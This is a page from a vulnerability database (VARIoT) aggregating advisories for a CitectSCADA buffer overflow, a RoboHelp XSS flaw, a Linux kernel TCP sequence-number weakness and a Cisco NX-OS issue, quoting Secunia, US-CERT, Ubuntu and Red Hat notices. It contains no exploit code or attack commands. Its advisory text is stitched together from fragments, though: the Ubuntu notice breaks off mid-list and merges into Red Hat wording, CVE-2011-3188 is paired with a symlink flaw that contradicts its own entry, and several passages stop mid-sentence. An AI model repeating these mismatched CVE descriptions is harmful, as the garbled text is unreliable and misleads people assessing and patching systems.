VARIoT IoT vulnerabilities database
VAR-201209-0581 | CVE-2011-5163 | CitectSCADA and Mitsubishi MX4 SCADA Buffer Overflow Vulnerability |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Buffer overflow in an unspecified third-party component in the Batch module for Schneider Electric CitectSCADA before 7.20 and Mitsubishi MX4 SCADA before 7.20 allows local users to execute arbitrary code via a long string in a login sequence. CitectSCADA is software for providing monitoring and control functions in the Data Acquisition and Monitoring System (SCADA). A buffer overflow vulnerability exists in CitectSCADA and Mitsubishi MX4 SCADA version 7.10. This vulnerability affects the Batch server module, which can be exploited by an attacker to run arbitrary code in the context of an application, and a failed attack attempt will result in a denial of service. CitectSCADA is an industrial control software used by Mitsubishi MX4 and Schneider Electric. Careful construction of string data can execute arbitrary code in the application context. CitectSCADA and Mitsubishi MX4 SCADA are prone to a buffer-overflow vulnerability that affects the Batch server module. Failed exploit attempts will result in a denial-of-service condition.
The following versions are vulnerable:
CitectSCADA 7.10 and prior
Mitsubishi MX4 SCADA 7.10 and prior. Citectscada is prone to a local security vulnerability. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach?
Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM:
http://secunia.com/products/corporate/vim/ovum_2011_request/
----------------------------------------------------------------------
TITLE:
Schneider Electric CitectSCADA Batch Server Login Buffer Overflow
Vulnerability
SECUNIA ADVISORY ID:
SA46779
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/46779/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=46779
RELEASE DATE:
2011-11-09
DISCUSS ADVISORY:
http://secunia.com/advisories/46779/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/46779/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46779
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Schneider Electric CitectSCADA,
which can be exploited by malicious people to compromise a vulnerable
system.
Successful exploitation may allow execution of arbitrary code.
SOLUTION:
Update to a fixed version. Please contact the vendor for details.
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Kuang-Chun Hung, Taiwan\x92s Information and
Communication Security Technology Center (ICST).
ORIGINAL ADVISORY:
CitectSCADA:
http://www.citect.com/citectscada-batch
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-02.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
The application bundles a vulnerable version of CitectSCADA
VAR-201108-0079 | CVE-2011-2133 | Adobe RoboHelp and RoboHelp Server Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 8 and 9 before 9.0.1.262, and RoboHelp Server 8 and 9, allows remote attackers to inject arbitrary web script or HTML via the URI, related to template_stock/whutils.js.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe RoboHelp Unspecified Cross-Site Scripting Vulnerability
SECUNIA ADVISORY ID:
SA45586
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45586/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45586
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45586/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45586/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45586
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Adobe RoboHelp, which can be
exploited by malicious people to conduct cross-site scripting
attacks.
Certain unspecified input is not properly sanitised before being
returned to the user.
SOLUTION:
Apply update (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Roberto Suggi Liverani, Security-Assessment.com.
ORIGINAL ADVISORY:
APSB11-23:
http://www.adobe.com/support/security/bulletins/apsb11-23.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA11-222A
Adobe Updates for Multiple Vulnerabilities
Original release date: August 10, 2011
Last revised: --
Source: US-CERT
Systems Affected
* Shockwave Player 11.6.0.626 and earlier versions for Windows and Macintosh
* Flash Media Server 4.0.2 and earlier versions for Windows and Linux
* Flash Media Server 3.5.6 and earlier versions for Windows and Linux
* Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux, and Solaris operating systems
* Adobe Flash Player 10.3.185.25 and earlier versions for Android
* Adobe AIR 2.7 and earlier versions for Windows, Macintosh, and Android
* Adobe Photoshop CS5 and CS5.1 and earlier versions for Windows and Macintosh
* RoboHelp 9 (versions 9.0.1.232 and earlier), RoboHelp 8, RoboHelp Server 9, and RoboHelp Server 8 for Windows
Overview
There are multiple vulnerabilities in Adobe Shockwave Player, Flash
Media Server, Flash Player, Photoshop CS5, and RoboHelp. Adobe has
released updates to address these vulnerabilities.
I. Description
Adobe security bulletins APSB11-19, APSB11-20, APSB11-21,
APSB11-22, and APSB11-23 describe multiple vulnerabilities in Adobe
Shockwave Player, Flash Media Server, Flash Player, Photoshop CS5,
and RoboHelp. An attacker may use these vulnerabilities to run
malicious code or cause a denial of service on an affected system.
Adobe has released updates to address these vulnerabilities.
II. Impact
These vulnerabilities could allow an attacker to run malicious code
on the affected system or cause a denial of service.
III. Solution
Users of these Adobe products should review the relevant Adobe
security bulletins and follow the recommendations in the "Solution"
section.
APSB11-19: Security update available for Adobe Shockwave Player
APSB11-20: Security update available for Adobe Flash Media Server
APSB11-21: Security update available for Adobe Flash Player
APSB11-22: Security update available for Adobe Photoshop CS5
APSB11-23: Security updates available for RoboHelp
IV. References
* Security update available for Adobe Shockwave Player -
<http://www.adobe.com/support/security/bulletins/apsb11-19.html>
* Security update available for Adobe Flash Media Server -
<http://www.adobe.com/support/security/bulletins/apsb11-20.html>
* Security update available for Adobe Flash Player -
<http://www.adobe.com/support/security/bulletins/apsb11-21.html>
* Security update available for Adobe Photoshop CS5 -
<http://www.adobe.com/support/security/bulletins/apsb11-22.html>
* Security updates available for RoboHelp -
<http://www.adobe.com/support/security/bulletins/apsb11-23.html>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA11-222A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA11-222A Feedback VU#628023" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2011 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
August 10, 2011: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBTkKXaz6pPKYJORa3AQL/lQgAgO8eDjAJt7tFpd9jW8YY0yf92QY84f2r
TQcMgYyxhyyuA0joIWQ7k6BkszfNns03tr6k9ay2r2e3dICUhtgugh20yeoyV6ua
gwII/qNhPoVPlt3z3yJR4BQzhlyAYMlG4CKJWxX84Hkpq9FeQYDRO6Ni8WF2wiUC
eeT7feK10Q+3w0UZinW11Cz6GISqQeb8E0YVX7lNH8svA/Du9UdOFnRgbWeBRtM9
4Fj+eRVdYqxpxy7z85EPIGwrKIop/D/HXaaNpXbkru1iXkLvAbBi2hpd4aeaQHva
wpaAuNYwv5WxbdmcarXuJqs3a0v9+Mwd39bf8OxqUXLUX8h4LyGWJA==
=QDsc
-----END PGP SIGNATURE-----
VAR-201205-0016 | CVE-2011-3188 | Linux Kernel Authorization problem vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
The (1) IPv4 and (2) IPv6 implementations in the Linux kernel before 3.1 use a modified MD4 algorithm to generate sequence numbers and Fragment Identification values, which makes it easier for remote attackers to cause a denial of service (disrupted networking) or hijack network sessions by predicting these values and sending crafted packets. The Linux kernel is prone to a security weakness related to TCP sequence number generation.
Attackers can exploit this issue to inject arbitrary packets into TCP sessions using brute force attack, to perform unauthorized actions. Attackers can cause a denial-of-service condition by injecting a SYN or RST packet into the TCP session, which terminates the established connection. Other attacks such as man-in-the-middle attacks are also possible. The NFSv4 implementation is one of the distributed file system protocols. ==========================================================================
Ubuntu Security Notice USN-1239-1
October 25, 2011
linux-ec2 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in the kernel.
(CVE-2011-1576)
Vasiliy Kulikov and Dan Rosenberg discovered that ecryptfs did not
correctly check the origin of mount points. (CVE-2011-1833)
Vasiliy Kulikov discovered that taskstats did not enforce access
restrictions. A local attacker could exploit this to read certain
information, leading to a loss of privacy. (CVE-2011-2494)
Vasiliy Kulikov discovered that /proc/PID/io did not enforce access
restrictions. A local attacker could exploit this to read certain
information, leading to a loss of privacy. (CVE-2011-2495)
Dan Rosenberg discovered that the Bluetooth stack incorrectly handled
certain L2CAP requests. If a system was using Bluetooth, a remote attacker
could send specially crafted traffic to crash the system or gain root
privileges. (CVE-2011-2497)
It was discovered that the EXT4 filesystem contained multiple off-by-one
flaws. (CVE-2011-2695)
Fernando Gont discovered that the IPv6 stack used predictable fragment
identification numbers.
(CVE-2011-2905)
Time Warns discovered that long symlinks were incorrectly handled on Be
filesystems. (CVE-2011-3188)
Darren Lavender discovered that the CIFS client incorrectly handled certain
large values. A remote attacker with a malicious server could exploit this
to crash the system or possibly execute arbitrary code as the root user.
(CVE-2011-3191)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 10.04 LTS:
linux-image-2.6.32-319-ec2 2.6.32-319.39
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-generic,
linux-server, linux-powerpc), a standard system upgrade will automatically
perform this as well. Note: To
correct this issue, the RHSA-2011:1241 ecryptfs-utils update must also be
installed. (CVE-2011-2496, Moderate)
* GRO (Generic Receive Offload) fields could be left in an inconsistent
state. GRO is enabled by default in all network drivers that
support it. (CVE-2011-2723, Moderate)
* RHSA-2011:1065 introduced a regression in the Ethernet bridge
implementation. Xen hypervisor and KVM (Kernel-based
Virtual Machine) hosts often deploy bridge interfaces. (CVE-2011-2942,
Moderate)
* A flaw in the Xen hypervisor IOMMU error handling implementation could
allow a privileged guest user, within a guest operating system that has
direct control of a PCI device, to cause performance degradation on the
host and possibly cause it to hang. The Ubuntu Security Team acknowledges
Vasiliy Kulikov of Openwall and Dan Rosenberg as the original reporters of
CVE-2011-1833. Relevant releases/architectures:
RHEV Hypervisor for RHEL-5 - noarch
3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2011:1465-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1465.html
Issue date: 2011-11-22
CVE Names: CVE-2011-1162 CVE-2011-1577 CVE-2011-2494
CVE-2011-2699 CVE-2011-2905 CVE-2011-3188
CVE-2011-3191 CVE-2011-3353 CVE-2011-3359
CVE-2011-3363 CVE-2011-3593 CVE-2011-4326
=====================================================================
1. Summary:
Updated kernel packages that fix multiple security issues and various bugs
are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
This update fixes the following security issues:
* IPv6 fragment identification value generation could allow a remote
attacker to disrupt a target system's networking, preventing legitimate
users from accessing its services. (CVE-2011-2699, Important)
* A signedness issue was found in the Linux kernel's CIFS (Common Internet
File System) implementation. A malicious CIFS server could send a
specially-crafted response to a directory read request that would result in
a denial of service or privilege escalation on a system that has a CIFS
share mounted. (CVE-2011-3191, Important)
* A flaw was found in the way the Linux kernel handled fragmented IPv6 UDP
datagrams over the bridge with UDP Fragmentation Offload (UFO)
functionality on. A remote attacker could use this flaw to cause a denial
of service. (CVE-2011-4326, Important)
* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were
generated could allow a man-in-the-middle attacker to inject packets and
possibly hijack connections. Protocol sequence numbers and fragment IDs are
now more random. (CVE-2011-3188, Moderate)
* A buffer overflow flaw was found in the Linux kernel's FUSE (Filesystem
in Userspace) implementation. A local user in the fuse group who has access
to mount a FUSE file system could use this flaw to cause a denial of
service. (CVE-2011-3353, Moderate)
* A flaw was found in the b43 driver in the Linux kernel. If a system had
an active wireless interface that uses the b43 driver, an attacker able to
send a specially-crafted frame to that interface could cause a denial of
service. (CVE-2011-3359, Moderate)
* A flaw was found in the way CIFS shares with DFS referrals at their root
were handled. An attacker on the local network who is able to deploy a
malicious CIFS server could create a CIFS network share that, when mounted,
would cause the client system to crash. (CVE-2011-3363, Moderate)
* A flaw was found in the way the Linux kernel handled VLAN 0 frames with
the priority tag set. When using certain network drivers, an attacker on
the local network could use this flaw to cause a denial of service.
(CVE-2011-3593, Moderate)
* A flaw in the way memory containing security-related data was handled in
tpm_read() could allow a local, unprivileged user to read the results of a
previously run TPM command. (CVE-2011-1162, Low)
* A heap overflow flaw was found in the Linux kernel's EFI GUID Partition
Table (GPT) implementation. A local attacker could use this flaw to cause
a denial of service by mounting a disk that contains specially-crafted
partition tables. (CVE-2011-1577, Low)
* The I/O statistics from the taskstats subsystem could be read without
any restrictions. A local, unprivileged user could use this flaw to gather
confidential information, such as the length of a password used in a
process. (CVE-2011-2494, Low)
* It was found that the perf tool, a part of the Linux kernel's Performance
Events implementation, could load its configuration file from the current
working directory. If a local user with access to the perf tool were
tricked into running perf in a directory that contains a specially-crafted
configuration file, it could cause perf to overwrite arbitrary files and
directories accessible to that user. (CVE-2011-2905, Low)
Red Hat would like to thank Fernando Gont for reporting CVE-2011-2699;
Darren Lavender for reporting CVE-2011-3191; Dan Kaminsky for reporting
CVE-2011-3188; Yogesh Sharma for reporting CVE-2011-3363; Gideon Naim for
reporting CVE-2011-3593; Peter Huewe for reporting CVE-2011-1162; Timo
Warns for reporting CVE-2011-1577; and Vasiliy Kulikov of Openwall for
reporting CVE-2011-2494.
This update also fixes various bugs. Documentation for these changes will
be available shortly from the Technical Notes document linked to in the
References section.
4. Solution:
Users should upgrade to these updated packages, which contain
backported patches to correct these issues, and fix the bugs noted in
the Technical Notes. The system must be rebooted for this update to
take effect.
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
To install kernel packages manually, use "rpm -ivh [package]". Do not
use "rpm -Uvh" as that will remove the running kernel binaries from
your system. You may use "rpm -e" to remove old kernels after
determining that the new kernel functions properly on your system.
5. Bugs fixed (http://bugzilla.redhat.com/):
695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops
716842 - CVE-2011-2494 kernel: taskstats io infoleak
723429 - CVE-2011-2699 kernel: ipv6: make fragment identifications less predictable
729808 - CVE-2011-2905 kernel: perf tools: may parse user-controlled configuration file
732629 - CVE-2011-1162 kernel: tpm: infoleak
732658 - CVE-2011-3188 kernel: net: improve sequence number generation
732869 - CVE-2011-3191 kernel: cifs: signedness issue in CIFSFindNext()
736761 - CVE-2011-3353 kernel: fuse: check size of FUSE_NOTIFY_INVAL_ENTRY message
738202 - CVE-2011-3359 kernel: b43: allocate receive buffers big enough for max frame len + offset
738291 - CVE-2011-3363 kernel: cifs: always do is_path_accessible check in cifs_mount
740352 - make guest mode entry to be rcu quiescent state [rhel-6.1.z]
741166 - enclosure fix [rhel-6.1.z]
742846 - CVE-2011-3593 kernel: vlan: fix panic when handling priority tagged frames
743807 - igb: failed to activate WOL on 2nd LAN port on i350 [rhel-6.1.z]
744811 - Non-responsive scsi target leads to excessive scsi recovery and dm-mp failover time [rhel-6.1.z]
748808 - Host got crash when guest running netperf client with UDP_STREAM protocol with IPV6 [rhel-6.1.z]
755584 - CVE-2011-4326 kernel: wrong headroom check in udp6_ufo_fragment()
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm
i386:
kernel-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm
kernel-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-headers-2.6.32-131.21.1.el6.i686.rpm
perf-2.6.32-131.21.1.el6.i686.rpm
perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-131.21.1.el6.noarch.rpm
kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm
kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm
perf-2.6.32-131.21.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm
noarch:
kernel-doc-2.6.32-131.21.1.el6.noarch.rpm
kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm
kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm
perf-2.6.32-131.21.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm
i386:
kernel-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm
kernel-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-headers-2.6.32-131.21.1.el6.i686.rpm
perf-2.6.32-131.21.1.el6.i686.rpm
perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-131.21.1.el6.noarch.rpm
kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm
ppc64:
kernel-2.6.32-131.21.1.el6.ppc64.rpm
kernel-bootwrapper-2.6.32-131.21.1.el6.ppc64.rpm
kernel-debug-2.6.32-131.21.1.el6.ppc64.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.ppc64.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm
kernel-debuginfo-common-ppc64-2.6.32-131.21.1.el6.ppc64.rpm
kernel-devel-2.6.32-131.21.1.el6.ppc64.rpm
kernel-headers-2.6.32-131.21.1.el6.ppc64.rpm
perf-2.6.32-131.21.1.el6.ppc64.rpm
perf-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm
s390x:
kernel-2.6.32-131.21.1.el6.s390x.rpm
kernel-debug-2.6.32-131.21.1.el6.s390x.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.s390x.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.s390x.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.s390x.rpm
kernel-debuginfo-common-s390x-2.6.32-131.21.1.el6.s390x.rpm
kernel-devel-2.6.32-131.21.1.el6.s390x.rpm
kernel-headers-2.6.32-131.21.1.el6.s390x.rpm
kernel-kdump-2.6.32-131.21.1.el6.s390x.rpm
kernel-kdump-debuginfo-2.6.32-131.21.1.el6.s390x.rpm
kernel-kdump-devel-2.6.32-131.21.1.el6.s390x.rpm
perf-2.6.32-131.21.1.el6.s390x.rpm
perf-debuginfo-2.6.32-131.21.1.el6.s390x.rpm
x86_64:
kernel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm
kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm
perf-2.6.32-131.21.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm
i386:
kernel-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm
kernel-devel-2.6.32-131.21.1.el6.i686.rpm
kernel-headers-2.6.32-131.21.1.el6.i686.rpm
perf-2.6.32-131.21.1.el6.i686.rpm
perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-131.21.1.el6.noarch.rpm
kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm
kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm
kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm
perf-2.6.32-131.21.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1162.html
https://www.redhat.com/security/data/cve/CVE-2011-1577.html
https://www.redhat.com/security/data/cve/CVE-2011-2494.html
https://www.redhat.com/security/data/cve/CVE-2011-2699.html
https://www.redhat.com/security/data/cve/CVE-2011-2905.html
https://www.redhat.com/security/data/cve/CVE-2011-3188.html
https://www.redhat.com/security/data/cve/CVE-2011-3191.html
https://www.redhat.com/security/data/cve/CVE-2011-3353.html
https://www.redhat.com/security/data/cve/CVE-2011-3359.html
https://www.redhat.com/security/data/cve/CVE-2011-3363.html
https://www.redhat.com/security/data/cve/CVE-2011-3593.html
https://www.redhat.com/security/data/cve/CVE-2011-4326.html
https://access.redhat.com/security/updates/classification/#important
https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.1_Technical_Notes/kernel.html#RHSA-2011-1465
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOy9KxXlSAg2UNWIIRApHRAKCrfJt7aIrWnGPf3TwUZKtul/8YUgCgtpZE
l5BuL6rArAsWl76KlBJjWFw=
=0G9b
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. Relevant releases/architectures:
MRG Realtime for RHEL 6 Server v.2 - noarch, x86_64
3.
This update also fixes the following bugs:
* Previously, a mismatch in the build-id of the kernel-rt and the one in
the related debuginfo package caused failures in SystemTap and perf.
(BZ#768413)
* IBM x3650m3 systems were not able to boot the MRG Realtime kernel because
they require a pmcraid driver that was not available
VAR-201202-0095 | CVE-2012-0352 |
plural Cisco Nexus Switch Cisco NX-OS Service disruption in (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201202-0768 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
